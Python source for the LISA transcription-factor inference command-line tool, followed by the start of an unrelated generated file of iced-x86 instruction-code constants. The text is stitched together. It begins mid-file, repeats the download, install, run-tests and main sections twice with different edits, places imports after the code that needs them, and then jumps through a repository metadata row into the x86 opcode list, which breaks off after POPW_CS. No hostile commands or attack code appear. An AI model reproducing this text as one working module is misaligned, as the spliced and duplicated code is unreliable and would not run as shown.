coverage_parser.add_argument('-q', '--query_genes', required = True, type = argparse.FileType('r', encoding = 'utf-8'), help = 'user-supplied gene list. One gene per line in either symbol or refseqID format')
coverage_parser.add_argument('-bw', '--bigwig_path', type = confirm_file, required = True, help = 'Bigwig file describing coverage over the genome.')
coverage_optional = coverage_parser.add_argument_group('optional arguments')
build_from_genes_args(coverage_optional, False)
build_one_list_args(coverage_optional, default_background_strategy='all')
build_common_args(coverage_optional)
coverage_optional.add_argument('-h', '--help', action = 'help', default=SUPPRESS)
coverage_parser.set_defaults(func = lisa_coverage)
#__ download command ___
def lisa_download(args):
    """CLI handler for ``lisa download``: fetch (or print the URL of) the
    dataset required by the chosen subcommand and species.
    """
    # oneshot/multi/coverage share the FromGenes dataset; regions has its own.
    if args.command in ['oneshot','multi','coverage']:
        _class = FromGenes
    elif args.command == 'regions':
        _class = FromRegions
    else:
        raise AssertionError('Command {} not recognized'.format(args.command))
    if args.url:
        print(_class.get_dataset_url(args.species))
    else:
        _class.download_dataset(args.species)
download_data_parser = subparsers.add_parser('download', description = 'Download data from CistromeDB. Use if data recieved is incomplete or malformed.')
download_data_parser.add_argument('species', choices = ['hg38','mm10'], help = 'Download data associated with human (hg38) or mouse (mm10) genes')
download_data_parser.add_argument('command', choices=['oneshot', 'multi', 'regions', 'coverage'], help = 'For which command to download data')
download_data_parser.add_argument('--url', action = 'store_true', help = 'Get url for data download. Does not install data.')
download_data_parser.set_defaults(func = lisa_download)
#__ install command ___
def install_data(args):
    """CLI handler for ``lisa install``: place a downloaded h5 dataset into
    LISA's install directory, optionally deleting the source copy.
    """
    # oneshot/multi/coverage share the FromGenes dataset; regions has its own.
    if args.command in ['oneshot','multi','coverage']:
        _class = FromGenes
    elif args.command == 'regions':
        _class = FromRegions
    else:
        raise AssertionError('Command {} not recognized'.format(args.command))
    dataset_file_required = os.path.basename(_class.get_dataset_path(args.species))
    if not args.force:
        # Guard against installing the wrong dataset under the expected name.
        assert(dataset_file_required == os.path.basename(args.dataset)), 'The {} test requires dataset {}. Use --force to overide and install your own dataset.'.format(args.command, dataset_file_required)
    if not os.path.isdir(INSTALL_PATH):
        os.mkdir(INSTALL_PATH)
    if args.remove:
        # Move (rename) rather than copy when the user asked for cleanup.
        os.rename(args.dataset, _class.get_dataset_path(args.species))
    else:
        copyfile(args.dataset, _class.get_dataset_path(args.species))
install_data_parser = subparsers.add_parser('install', description = 'Helper command for manually installing Lisa\'s data')
install_data_parser.add_argument('species', choices = ['hg38','mm10'], help = 'Install data associated with human (hg38) or mouse (mm10) genes')
install_data_parser.add_argument('command', choices=['oneshot', 'multi', 'regions', 'coverage'], help = 'For which command to install data')
install_data_parser.add_argument('dataset', type = confirm_file, help = 'Path to downloaded h5 dataset')
install_data_parser.add_argument('--remove', action = 'store_true', help = 'Delete dataset after installation is complete.')
install_data_parser.add_argument('--force', action = 'store_true', help = 'Skip namecheck and install lisa custom dataset')
install_data_parser.set_defaults(func = install_data)
#____ LISA run tests command ___
test_parser = subparsers.add_parser('run-tests')
test_parser.add_argument('species', type = str, choices=['hg38','mm10'])
test_parser.add_argument('test_genelist', type = confirm_file, help = 'test genelist for oneshot command')
test_parser.add_argument('background_genelist', type = confirm_file, help = 'background genelist for oneshot command')
test_parser.add_argument('genelists', nargs = '+', type = str, help = 'genelists for testing multi and one-vs-rest commands')
test_parser.add_argument('--skip_oneshot', action='store_true')
# NOTE: a stray module-level `args = parser.parse_args()` used to run here; it
# parsed sys.argv at import time (exiting on unrelated argv, before `func` was
# set for this subparser) and its result was discarded — main() does the real
# parse — so it has been removed.
test_parser.set_defaults(func = run_tests)
def main():
    """CLI entry point: parse arguments and dispatch to the chosen subcommand.

    If no subcommand was given (so no ``func`` default is set on the
    namespace), the full help text is printed to stderr. Known errors raised
    by subcommands are reported as ``ERROR: ...`` and exit with status 1.
    """
    args = parser.parse_args()
    try:
        func = args.func  # absent when the user ran bare "lisa" with no subcommand
    except AttributeError:
        # print_help() writes directly to the given stream and returns None;
        # the previous `print(parser.print_help(), file=sys.stderr)` therefore
        # also emitted a spurious "None" line. Pass the stream instead.
        parser.print_help(sys.stderr)
    else:
        try:
            func(args)
        except (AssertionError, DownloadRequiredError, DatasetNotFoundError, MultiError) as err:
            print('ERROR: ' + str(err), file = sys.stderr)
            sys.exit(1)
from lisa import FromRegions, FromGenes, FromCoverage
from lisa.core.utils import Log
from lisa.core.lisa_core import DownloadRequiredError
from lisa.core.data_interface import DatasetNotFoundError, INSTALL_PATH
from lisa._version import __version__
import configparser
import argparse
import os
import sys
import json
from collections import defaultdict
from shutil import copyfile
import lisa.cli.test_cli as tests
from shutil import copyfile
import numpy as np
from lisa.lisa_public_data.genes_test import _config as public_config
from lisa.lisa_user_data.regions_test import _config as user_config
from lisa.core.io import parse_deseq_file
# Keyword names used to split the parsed argparse namespace between the LISA
# model constructor and its predict() call (see extract_kwargs in this file).
INSTANTIATION_KWARGS = ['isd_method','verbose','assays', 'rp_map']
PREDICTION_KWARGS = ['background_list','num_background_genes','background_strategy', 'seed']
def extract_kwargs(args, keywords):
    """Pull the named attributes out of an argparse namespace as a dict."""
    namespace = vars(args)
    selected = {}
    for name in keywords:
        selected[name] = namespace[name]
    return selected
def is_valid_prefix(prefix):
    """argparse type-check for output prefixes.

    A bare name (no '/') is always accepted; a path-like prefix must name an
    existing file or directory, or sit inside an existing directory.
    """
    if '/' not in prefix:
        return prefix
    parent_exists = os.path.isdir(os.path.dirname(prefix))
    if os.path.isdir(prefix) or os.path.isfile(prefix) or parent_exists:
        return prefix
    raise argparse.ArgumentTypeError('{}: Invalid file prefix.'.format(prefix))
def save_results(args, results, metadata):
    """Emit the TSV results (to a file, or stdout when no prefix was given)
    and, when --save_metadata was passed, the JSON metadata alongside."""
    if args.save_metadata:
        if args.output_prefix:
            stem = args.output_prefix
        else:
            # No prefix: name the metadata file after the query genelist.
            stem = os.path.basename(args.query_list.name)
        with open(stem + '.metadata.json', 'w') as meta_file:
            meta_file.write(json.dumps(metadata, indent=4))
    tsv_text = results.to_tsv()
    if args.output_prefix is None:
        print(tsv_text)
    else:
        with open(args.output_prefix + '.lisa.tsv', 'w') as tsv_file:
            tsv_file.write(tsv_text)
def lisa_oneshot(args):
    """Run the single-genelist LISA test and emit results via save_results."""
    # --background_list arrives as an open file handle (or None); materialize
    # it into lines when it supports readlines().
    if hasattr(args.background_list, 'readlines'):
        args.background_list = args.background_list.readlines()
    model = FromGenes(args.species, **extract_kwargs(args, INSTANTIATION_KWARGS))
    results, metadata = model.predict(args.query_list.readlines(),
        **extract_kwargs(args, PREDICTION_KWARGS))
    save_results(args, results, metadata)
def lisa_regions(args):
    """Run the user-regions LISA test from a bed file or MACS2 .xls output."""
    if hasattr(args.background_list, 'readlines'):
        args.background_list = args.background_list.readlines()
    # Dispatch on the input format flag: MACS2 xls vs. plain bed file.
    runner = FromRegions.using_macs_output if args.macs_xls else FromRegions.using_bedfile
    results, metadata = runner(
        args.species, args.query_genes, args.regions,
        rp_map = args.rp_map, rp_decay = args.rp_decay,
        isd_method = args.isd_method, background_list = args.background_list,
        background_strategy = args.background_strategy,
        num_background_genes = args.num_background_genes,
        seed = args.seed, header = args.header)
    save_results(args, results, metadata)
def lisa_coverage(args):
    """Run the LISA test against a user-supplied bigwig coverage track."""
    if hasattr(args.background_list, 'readlines'):
        args.background_list = args.background_list.readlines()
    results, metadata = FromCoverage.using_bigwig(
        args.species, args.query_genes, args.bigwig_path,
        rp_map = args.rp_map, isd_method = args.isd_method,
        background_list = args.background_list,
        background_strategy = args.background_strategy,
        num_background_genes = args.num_background_genes,
        seed = args.seed)
    save_results(args, results, metadata)
def save_and_get_top_TFs(args, query_name, results, metadata):
    """Write per-query result files and return the unique top factors.

    Writes ``<output_prefix><query_name>.lisa.tsv`` and, when
    ``args.save_metadata`` is set, the matching ``.metadata.json``.
    Returns the factor names from the ten highest-ranked rows,
    de-duplicated while preserving rank order.
    """
    with open(args.output_prefix + query_name + '.lisa.tsv', 'w') as f:
        f.write(results.to_tsv())
    if args.save_metadata:
        with open(args.output_prefix + query_name + '.metadata.json', 'w') as f:
            f.write(json.dumps(metadata, indent=4))
    top_TFs = results.to_dict()['factor']
    # dict.fromkeys de-duplicates while keeping rank order; the previous
    # list(set(...)) scrambled the reported order non-deterministically.
    return list(dict.fromkeys(top_TFs[:10]))
def print_results_multi(results_summary):
    """Print a (sample, top-factors) summary table to stdout."""
    print('Sample\tTop Regulatory Factors:')
    for sample_name, factors in results_summary:
        print(sample_name, ', '.join(factors), sep = '\t')
class MultiError(Exception):
    """Raised by the multi-genelist commands when at least one genelist failed."""
    pass
def lisa_multi(args):
    """Run LISA independently on several genelists with one shared data load,
    then print a per-sample summary of top factors.

    Raises MultiError after the summary when any list failed.
    """
    log = Log(target = sys.stderr, verbose = args.verbose)
    lisa = FromGenes(args.species, **extract_kwargs(args, INSTANTIATION_KWARGS), log = log)
    # Keyed by basename: lists that share a filename collapse to the last one.
    query_dict = {os.path.basename(query.name) : query.readlines() for query in args.query_lists}
    summary = []
    all_succeeded = True
    for list_name, gene_lines in query_dict.items():
        with log.section('Modeling {}:'.format(str(list_name))):
            try:
                results, metadata = lisa.predict(gene_lines, **extract_kwargs(args, PREDICTION_KWARGS))
                summary.append((list_name, save_and_get_top_TFs(args, list_name, results, metadata)))
            except AssertionError as err:
                all_succeeded = False
                log.append('ERROR: ' + str(err))
    print_results_multi(summary)
    if not all_succeeded:
        raise MultiError('One or more genelists raised an error')
def lisa_deseq(args):
    """Run LISA on the up- and down-regulated gene sets parsed from a DESeq2
    results file, writing one result set per direction and printing a
    summary. Raises MultiError if either direction fails."""
    log = Log(target = sys.stderr, verbose = args.verbose)
    lisa = FromGenes(args.species, **extract_kwargs(args, INSTANTIATION_KWARGS), log = log)
    up_genes, down_genes = parse_deseq_file(args.deseq_file, lfc_cutoff = args.lfc_cutoff,
        pval_cutoff= args.pval_cutoff, sep = args.sep)
    results_summary = []
    all_passed = True
    # Each direction is modeled independently: a failure in one does not stop
    # the other, but is logged and triggers MultiError after the summary.
    for prefix, query_list in zip(['up-regulated', 'down-regulated'], [up_genes, down_genes]):
        with log.section('Modeling {}:'.format(str(prefix))):
            try:
                results, metadata = lisa.predict(query_list, **extract_kwargs(args, PREDICTION_KWARGS))
                top_TFs_unique = save_and_get_top_TFs(args, prefix, results, metadata)
                results_summary.append((prefix, top_TFs_unique))
            except AssertionError as err:
                all_passed = False
                log.append('ERROR: ' + str(err))
    print_results_multi(results_summary)
    if not all_passed:
        raise MultiError('One or more genelists raised an error')
def confirm_file(arg):
    """argparse type-check: pass through a path that names an existing file."""
    if not os.path.isfile(arg):
        raise argparse.ArgumentTypeError('ERROR: {} is not a valid file'.format(str(arg)))
    return arg
def run_tests(args):
    """Entry point for the ``run-tests`` subcommand: exercise the CLI
    end-to-end; the (slow) oneshot test can be skipped with --skip_oneshot."""
    if not args.skip_oneshot:
        tests.test_oneshot(args.test_genelist, args.background_genelist)
    tests.test_multi(args.genelists)
def build_common_args(parser):
    """Attach the flags shared by every LISA subcommand to *parser*."""
    parser.add_argument(
        '--seed', type = int, default = 2556,
        help = 'Random seed for gene selection. Allows for reproducing exact results.')
    parser.add_argument(
        '--use_motifs', action = 'store_const', const = 'motifs',
        default='chipseq', dest = 'isd_method',
        help = 'Use motif hits instead of ChIP-seq peaks to represent TF binding (only recommended if TF-of-interest is not represented in ChIP-seq database).')
    parser.add_argument(
        '--save_metadata', action = 'store_true', default = False,
        help = 'Save json-formatted metadata from processing each gene list.')
def build_from_genes_args(parser, add_assays = True):
    """Add FromGenes-specific options (assay set and rp_map style).

    add_assays: include the -a/--assays flag (the coverage command passes
    False since it does not run the full assay set).
    """
    if add_assays:
        parser.add_argument('-a','--assays',nargs='+',default=['Direct','H3K27ac','DNase'], choices=['Direct','H3K27ac','DNase'], help = 'Which set of insilico-deletion assays to run.')
    # Help-text typo fixed: "stricly" -> "strictly".
    parser.add_argument('--rp_map_style', dest = 'rp_map', choices=public_config.get('lisa_params','rp_map_styles').split(','),
        default= public_config.get('lisa_params','rp_map_styles').split(',')[0], help = 'Which style of rp_map to assess influence of regions on genes. "basic" is strictly distance-based, while "enhanced" masks the exon and promoter regions of nearby genes.')
def build_multiple_lists_args(parser):
    """Add the options shared by the multi-genelist commands (multi, deseq)."""
    parser.add_argument('-o','--output_prefix', required = True, type = is_valid_prefix, help = 'Output file prefix.')
    parser.add_argument('-v','--verbose',type = int, default = 2)
    # Help-text grammar fixed: "are selection from" -> "are selected from".
    parser.add_argument('-b','--num_background_genes', type = int, default = public_config.get('lisa_params', 'background_genes'),
        help = 'Number of sampled background genes to compare to user-supplied genes. These genes are selected from other gene lists.')
    parser.add_argument('--random_background', action = 'store_const', const = 'random', default = 'regulatory', dest = 'background_strategy', help = 'Use random background selection rather than "regulatory" selection.')
def build_one_list_args(parser, default_background_strategy = 'regulatory'):
    """Add options for commands that take a single query genelist
    (output prefix, background selection, verbosity)."""
    parser.add_argument('-o','--output_prefix', required = False, type = is_valid_prefix, help = 'Output file prefix. If left empty, will write results to stdout.')
    parser.add_argument('--background_strategy', choices = public_config.get('lisa_params', 'background_strategies').split(','),
        default = default_background_strategy,
        help = """Background genes selection strategy. LISA samples background genes to compare to user\'s genes-of-interest from a diverse
regulatory background (regulatory - recommended), randomly from all genes (random), or uses a user-provided list (provided).
""")
    # --background_list and -b are mutually exclusive ways to define the background.
    background_genes_group = parser.add_mutually_exclusive_group()
    background_genes_group.add_argument('--background_list', type = argparse.FileType('r', encoding = 'utf-8'), required = False,
        help = 'user-supplied list of backgroung genes. Used when --background_strategy flag is set to "provided"')
    background_genes_group.add_argument('-b','--num_background_genes', type = int, default = public_config.get('lisa_params', 'background_genes'),
        help = 'Number of sampled background genes to compare to user-supplied genes')
    parser.add_argument('-v','--verbose',type = int, default = 4)
def build_deseq_args(parser):
    """Add the DESeq2-input options (results file, LFC and p-value cutoffs,
    field separator) used by the deseq subcommand."""
    parser.add_argument('deseq_file', type = confirm_file, help = 'DEseq differential expression output file. Will be parsed for differentially up and down-regulated genes.')
    parser.add_argument('-lfc','--lfc_cutoff', type = float, default = 1, help = 'Log2 fold-change cutoff. For up-regulated genes, must have LFC > cutoff. For down-regulated genes, less than -1 * cutoff. Default of 1 means genes must be up or down-regulated by a factor of 2 to be included in query.')
    parser.add_argument('-p','--pval_cutoff', type = float, default = 0.1, help = 'Adjusted p-value cutoff. Gene must have pval below cutoff to be a query gene.')
    parser.add_argument('--sep', type = str, default='\t', help = 'Field separator for DESeq output file.')
class RstFormatter(argparse.ArgumentDefaultsHelpFormatter, argparse.RawTextHelpFormatter):
    """Help formatter that shows argument defaults while preserving the raw
    (RST-style) layout of the subcommand description text."""
    pass
parser = argparse.ArgumentParser(
formatter_class=RstFormatter,
description =
"""
Lisa: inferring transcriptional regulators through integrative modeling of public chromatin accessibility and ChIP-seq data
https://genomebiology.biomedcentral.com/articles/10.1186/s13059-020-1934-6
X. Shirley Liu Lab, 2020
""")
parser.add_argument('--version', action = 'version', version = __version__)
subparsers = parser.add_subparsers(help = 'commands')
#__ LISA oneshot command __
oneshot_parser = subparsers.add_parser('oneshot', formatter_class=RstFormatter, description = '''
lisa oneshot
------------
You have:
* one genelist
Use LISA to infer influential TFs from one gene list, with background epigenetic landscape modeled using public data.
If you have multiple lists, this option will be slower than using "multi" due to data-loading time. \n
Example::
$ lisa oneshot hg38 ./genelist.txt -b 501 --seed=2556 --save_metadata > results.tsv
''')
# oneshot: positional arguments, then the shared option groups.
oneshot_parser.add_argument('species', choices = ['hg38','mm10'], help = 'Find TFs associated with human (hg38) or mouse (mm10) genes')
oneshot_parser.add_argument('query_list', type = argparse.FileType('r', encoding = 'utf-8'), help = 'user-supplied gene lists. One gene per line in either symbol or refseqID format')
build_one_list_args(oneshot_parser)
build_from_genes_args(oneshot_parser)
build_common_args(oneshot_parser)
oneshot_parser.set_defaults(func = lisa_oneshot)
deseq_parser = subparsers.add_parser('deseq', formatter_class = RstFormatter, description = '''
lisa deseq
----------
You have:
* RNA-seq differential expression results from DESeq2
Use LISA to infer influential TFs given differentially expressed genes found using DESeq2. Will seperate up-regulated and down-regulated genes into their own LISA tests.
Example::
$ lisa deseq hg38 ./deseq_results.tsv -o deseq/ -b 501 --seed=2556 --save_metadata
''')
# deseq: DESeq2-specific options plus the multi-list and shared groups.
deseq_parser.add_argument('species', choices = ['hg38','mm10'], help = 'Find TFs associated with human (hg38) or mouse (mm10) genes')
build_deseq_args(deseq_parser)
build_multiple_lists_args(deseq_parser)
build_from_genes_args(deseq_parser)
build_common_args(deseq_parser)
deseq_parser.set_defaults(func = lisa_deseq, background_list = None)
#__ LISA multi command __
multi_parser = subparsers.add_parser('multi', formatter_class=RstFormatter, description = '''
lisa multi
----------
You have:
* multiple genelists
Use LISA to infer influential TFs from multiple lists. This function processes each genelist independently in the same manner as the "oneshot" command, but reduces data loading time. Useful when performing
the test on up and down-regulated genes from multiple RNA-seq clusters.
Example::
$ lisa multi hg38 ./genelists/*.txt -b 501 -o ./results/
''')
# multi: several query lists processed independently with one data load.
multi_parser.add_argument('species', choices = ['hg38','mm10'], help = 'Find TFs associated with human (hg38) or mouse (mm10) genes')
multi_parser.add_argument('query_lists', type = argparse.FileType('r', encoding = 'utf-8'), nargs = "+", help = 'user-supplied gene lists. One gene per line in either symbol or refseqID format')
build_multiple_lists_args(multi_parser)
build_from_genes_args(multi_parser)
build_common_args(multi_parser)
multi_parser.set_defaults(func = lisa_multi, background_list = None)
from argparse import SUPPRESS
#____ LISA regions command ____
regions_parser = subparsers.add_parser('regions', formatter_class=RstFormatter, add_help = False, description = '''
lisa regions
------------
You have:
* one genelist
* regions (250 - 1000 bp wide) of interest related to that list
* optional: a positive score/weight associated with each region (you may pass zero-weight regions, but they do not affect the test and will be filtered out)
Use LISA to infer TF influence on your geneset, but provide your regions-of-interest rather than building a background epigenetic model using public data. When providing
your own regions, LISA uses higher resolution, more precise binding data to increase the power of the test. Your regions should be between ~250 and 1000 bp in width, and the
associated score should be positive. Scores are often read-depth at those regions, but can be any metic you think may influence gene regulation.
Example::
$ lisa regions -r ./regions.bed -q ./genelist.txt --save_metadata > results.tsv
$ lisa regions -r ./macs_peaks.xls -q ./genelist.txt --macs_xls > results.tsv
''')
# regions: required -q/-r inputs, then region-specific tuning options.
regions_parser.add_argument('species', choices = ['hg38','mm10'], help = 'Find TFs associated with human (hg38) or mouse (mm10) genes')
regions_required = regions_parser.add_argument_group('required arguments')
regions_required.add_argument('-q', '--query_genes', required = True, type = argparse.FileType('r', encoding = 'utf-8'), help = 'user-supplied gene list. One gene per line in either symbol or refseqID format')
regions_required.add_argument('-r', '--regions', type = confirm_file, required = True, help = 'Tad-delineated bed file with columns: chr, start, end[, score]. The score column is optional. If not provided, LISA will assign each region a uniform weight.')
regions_optional = regions_parser.add_argument_group('optional arguments')
regions_optional.add_argument('--header', action = 'store_true', default=False, help = 'Bed file has header row as first row. The header row may contain ')
regions_optional.add_argument('--macs_xls', action = 'store_true', default=False, help='If provided, regions file is a MACS2 .xls output file, and the "pileup" field is taken to be the region score.')
regions_optional.add_argument('--rp_map_style', dest = 'rp_map', choices=user_config.get('lisa_params','rp_map_styles').split(','),
        default=user_config.get('lisa_params','rp_map_styles').split(',')[0])
regions_optional.add_argument('--rp_decay', type = int, default = user_config.get('lisa_params','rp_decay'),
        help = 'Distance in base-pairs in which the influence of a region on a gene decays by half. Increase for more weight on distal elements, decrease for more weight on promoter elements.')
build_one_list_args(regions_optional, default_background_strategy='all')
build_common_args(regions_optional)
regions_optional.add_argument('-h', '--help', action = 'help', default=SUPPRESS)
regions_parser.set_defaults(func = lisa_regions)
#___ LISA coverage commands _____
coverage_parser = subparsers.add_parser('coverage', formatter_class = RstFormatter, add_help = False, description = '''
lisa coverage
------------
You have:
* one genelist
* bigwig of coverage over the genome
Use LISA to infer TF influence on your geneset using your own coverage data. This test is better suited than the "regions" test when your measure produces wide peaks/areas of influence.
An example of this is H3K27ac data, which correlates with gene expression similarly to accessibility, but produces wide peaks that may span many distinct TF binding locations.
Example::
$ lisa coverage -bw ./sample.bigwig -q ./genelist.txt --save_metadata > results.tsv
''')
# coverage: query genes plus a bigwig track; no assay selection (False below).
coverage_parser.add_argument('species', choices = ['hg38','mm10'], help = 'Find TFs associated with human (hg38) or mouse (mm10) genes')
coverage_parser.add_argument('-q', '--query_genes', required = True, type = argparse.FileType('r', encoding = 'utf-8'), help = 'user-supplied gene list. One gene per line in either symbol or refseqID format')
coverage_parser.add_argument('-bw', '--bigwig_path', type = confirm_file, required = True, help = 'Bigwig file describing coverage over the genome.')
coverage_optional = coverage_parser.add_argument_group('optional arguments')
build_from_genes_args(coverage_optional, False)
build_one_list_args(coverage_optional, default_background_strategy='all')
build_common_args(coverage_optional)
coverage_optional.add_argument('-h', '--help', action = 'help', default=SUPPRESS)
coverage_parser.set_defaults(func = lisa_coverage)
#__ download command ___
def lisa_download(args):
    """Fetch (or, with --url, just print the URL of) the dataset backing the
    given subcommand and species.

    Raises AssertionError (reported by main()) for an unknown command.
    """
    if args.command == 'regions':
        dataset_class = FromRegions
    elif args.command in ('oneshot', 'multi', 'coverage'):
        dataset_class = FromGenes
    else:
        raise AssertionError('Command {} not recognized'.format(args.command))
    if args.url:
        print(dataset_class.get_dataset_url(args.species))
    else:
        dataset_class.download_dataset(args.species)
#__ download command parser ___
# User-facing typo fixed in the description: "recieved" -> "received".
download_data_parser = subparsers.add_parser('download', description = 'Download data from CistromeDB. Use if data received is incomplete or malformed.')
download_data_parser.add_argument('species', choices = ['hg38','mm10'], help = 'Download data associated with human (hg38) or mouse (mm10) genes')
download_data_parser.add_argument('command', choices=['oneshot', 'multi', 'regions', 'coverage'], help = 'For which command to download data')
download_data_parser.add_argument('--url', action = 'store_true', help = 'Get url for data download. Does not install data.')
download_data_parser.set_defaults(func = lisa_download)
#__ install command ___
def install_data(args):
    """Install a manually downloaded h5 dataset into Lisa's data directory.

    Unless --force is given, validates that the file name matches the dataset
    the chosen subcommand expects, then moves (--remove) or copies the file
    into place.

    Raises AssertionError (caught and reported by main()) on an unknown
    command or a dataset name mismatch.
    """
    if args.command in ('oneshot', 'multi', 'coverage'):
        _class = FromGenes
    elif args.command == 'regions':
        _class = FromRegions
    else:
        raise AssertionError('Command {} not recognized'.format(args.command))
    dataset_file_required = os.path.basename(_class.get_dataset_path(args.species))
    if not args.force and dataset_file_required != os.path.basename(args.dataset):
        # Explicit raise instead of `assert`: still enforced under `python -O`.
        # (Also fixes the "overide" typo in the user-facing message.)
        raise AssertionError(
            'The {} test requires dataset {}. Use --force to override and install your own dataset.'
            .format(args.command, dataset_file_required))
    # makedirs(exist_ok=True) avoids the isdir/mkdir race on concurrent runs.
    os.makedirs(INSTALL_PATH, exist_ok = True)
    if args.remove:
        os.rename(args.dataset, _class.get_dataset_path(args.species))
    else:
        copyfile(args.dataset, _class.get_dataset_path(args.species))
#__ install command parser ___
install_data_parser = subparsers.add_parser('install', description = 'Helper command for manually installing Lisa\'s data')
install_data_parser.add_argument('species', choices = ['hg38','mm10'], help = 'Install data associated with human (hg38) or mouse (mm10) genes')
install_data_parser.add_argument('command', choices=['oneshot', 'multi', 'regions', 'coverage'], help = 'For which command to install data')
install_data_parser.add_argument('dataset', type = confirm_file, help = 'Path to downloaded h5 dataset')
install_data_parser.add_argument('--remove', action = 'store_true', help = 'Delete dataset after installation is complete.')
install_data_parser.add_argument('--force', action = 'store_true', help = 'Skip namecheck and install lisa custom dataset')
install_data_parser.set_defaults(func = install_data)
#____ LISA run tests command ___
test_parser = subparsers.add_parser('run-tests')
test_parser.add_argument('species', type = str, choices=['hg38','mm10'])
test_parser.add_argument('test_genelist', type = confirm_file, help = 'test genelist for oneshot command')
test_parser.add_argument('background_genelist', type = confirm_file, help = 'background genelist for oneshot command')
test_parser.add_argument('genelists', nargs = '+', type = str, help = 'genelists for testing multi and one-vs-rest commands')
test_parser.add_argument('--skip_oneshot', action='store_true')
# NOTE: a stray module-level `args = parser.parse_args()` used to run here.
# It consumed sys.argv at import time (before the set_defaults below was
# applied) and duplicated the parse performed in main(), so it was removed.
test_parser.set_defaults(func = run_tests)
def main():
    """CLI entry point: parse arguments and dispatch to the chosen subcommand.

    If no subcommand was given (so no ``func`` default is set), print the
    help text to stderr. Known subcommand errors are reported as
    ``ERROR: ...`` and exit with status 1.
    """
    args = parser.parse_args()
    try:
        func = args.func  # missing when no subcommand was supplied
    except AttributeError:
        # print_help() writes to the given stream itself and returns None;
        # the previous `print(parser.print_help(), ...)` also emitted a
        # spurious "None" line to stderr.
        parser.print_help(sys.stderr)
    else:
        try:
            func(args)
        except (AssertionError, DownloadRequiredError, DatasetNotFoundError, MultiError) as err:
            print('ERROR: ' + str(err), file = sys.stderr)
            sys.exit(1)
f725f58bf735ca99258ae36b96512040ca305b63 | 608,328 | py | Python | src/rust/iced-x86-py/src/iced_x86/Code.py | woodruffw-forks/iced | cf23473cf26cd7215dee7510093fad140c696cc7 | [
"MIT"
] | 1 | 2021-06-10T15:26:22.000Z | 2021-06-10T15:26:22.000Z | src/rust/iced-x86-py/src/iced_x86/Code.py | paulfariello/iced | 08f663ae9626b05ab08ad36dd5143f94aed365b6 | [
"MIT"
] | null | null | null | src/rust/iced-x86-py/src/iced_x86/Code.py | paulfariello/iced | 08f663ae9626b05ab08ad36dd5143f94aed365b6 | [
"MIT"
] | null | null | null | # SPDX-License-Identifier: MIT
# Copyright (C) 2018-present iced project and contributors
# ⚠️This file was generated by GENERATOR!🦹♂️
# pylint: disable=invalid-name
# pylint: disable=line-too-long
# pylint: disable=too-many-lines
"""
x86 instruction code
"""
INVALID: int = 0
"""
It's an invalid instruction, eg. it's a new unknown instruction, garbage or there's not enough bytes to decode the instruction etc.
"""
DECLAREBYTE: int = 1
"""
A ``db``/``.byte`` asm directive that can store 1-16 bytes
"""
DECLAREWORD: int = 2
"""
A ``dw``/``.word`` asm directive that can store 1-8 words
"""
DECLAREDWORD: int = 3
"""
A ``dd``/``.int`` asm directive that can store 1-4 dwords
"""
DECLAREQWORD: int = 4
"""
A ``dq``/``.quad`` asm directive that can store 1-2 qwords
"""
ADD_RM8_R8: int = 5
"""
``ADD r/m8, r8``
``00 /r``
``8086+``
``16/32/64-bit``
"""
ADD_RM16_R16: int = 6
"""
``ADD r/m16, r16``
``o16 01 /r``
``8086+``
``16/32/64-bit``
"""
ADD_RM32_R32: int = 7
"""
``ADD r/m32, r32``
``o32 01 /r``
``386+``
``16/32/64-bit``
"""
ADD_RM64_R64: int = 8
"""
``ADD r/m64, r64``
``o64 01 /r``
``X64``
``64-bit``
"""
ADD_R8_RM8: int = 9
"""
``ADD r8, r/m8``
``02 /r``
``8086+``
``16/32/64-bit``
"""
ADD_R16_RM16: int = 10
"""
``ADD r16, r/m16``
``o16 03 /r``
``8086+``
``16/32/64-bit``
"""
ADD_R32_RM32: int = 11
"""
``ADD r32, r/m32``
``o32 03 /r``
``386+``
``16/32/64-bit``
"""
ADD_R64_RM64: int = 12
"""
``ADD r64, r/m64``
``o64 03 /r``
``X64``
``64-bit``
"""
ADD_AL_IMM8: int = 13
"""
``ADD AL, imm8``
``04 ib``
``8086+``
``16/32/64-bit``
"""
ADD_AX_IMM16: int = 14
"""
``ADD AX, imm16``
``o16 05 iw``
``8086+``
``16/32/64-bit``
"""
ADD_EAX_IMM32: int = 15
"""
``ADD EAX, imm32``
``o32 05 id``
``386+``
``16/32/64-bit``
"""
ADD_RAX_IMM32: int = 16
"""
``ADD RAX, imm32``
``o64 05 id``
``X64``
``64-bit``
"""
PUSHW_ES: int = 17
"""
``PUSH ES``
``o16 06``
``8086+``
``16/32-bit``
"""
PUSHD_ES: int = 18
"""
``PUSH ES``
``o32 06``
``386+``
``16/32-bit``
"""
POPW_ES: int = 19
"""
``POP ES``
``o16 07``
``8086+``
``16/32-bit``
"""
POPD_ES: int = 20
"""
``POP ES``
``o32 07``
``386+``
``16/32-bit``
"""
OR_RM8_R8: int = 21
"""
``OR r/m8, r8``
``08 /r``
``8086+``
``16/32/64-bit``
"""
OR_RM16_R16: int = 22
"""
``OR r/m16, r16``
``o16 09 /r``
``8086+``
``16/32/64-bit``
"""
OR_RM32_R32: int = 23
"""
``OR r/m32, r32``
``o32 09 /r``
``386+``
``16/32/64-bit``
"""
OR_RM64_R64: int = 24
"""
``OR r/m64, r64``
``o64 09 /r``
``X64``
``64-bit``
"""
OR_R8_RM8: int = 25
"""
``OR r8, r/m8``
``0A /r``
``8086+``
``16/32/64-bit``
"""
OR_R16_RM16: int = 26
"""
``OR r16, r/m16``
``o16 0B /r``
``8086+``
``16/32/64-bit``
"""
OR_R32_RM32: int = 27
"""
``OR r32, r/m32``
``o32 0B /r``
``386+``
``16/32/64-bit``
"""
OR_R64_RM64: int = 28
"""
``OR r64, r/m64``
``o64 0B /r``
``X64``
``64-bit``
"""
OR_AL_IMM8: int = 29
"""
``OR AL, imm8``
``0C ib``
``8086+``
``16/32/64-bit``
"""
OR_AX_IMM16: int = 30
"""
``OR AX, imm16``
``o16 0D iw``
``8086+``
``16/32/64-bit``
"""
OR_EAX_IMM32: int = 31
"""
``OR EAX, imm32``
``o32 0D id``
``386+``
``16/32/64-bit``
"""
OR_RAX_IMM32: int = 32
"""
``OR RAX, imm32``
``o64 0D id``
``X64``
``64-bit``
"""
PUSHW_CS: int = 33
"""
``PUSH CS``
``o16 0E``
``8086+``
``16/32-bit``
"""
PUSHD_CS: int = 34
"""
``PUSH CS``
``o32 0E``
``386+``
``16/32-bit``
"""
POPW_CS: int = 35
"""
``POP CS``
``o16 0F``
``8086``
``16-bit``
"""
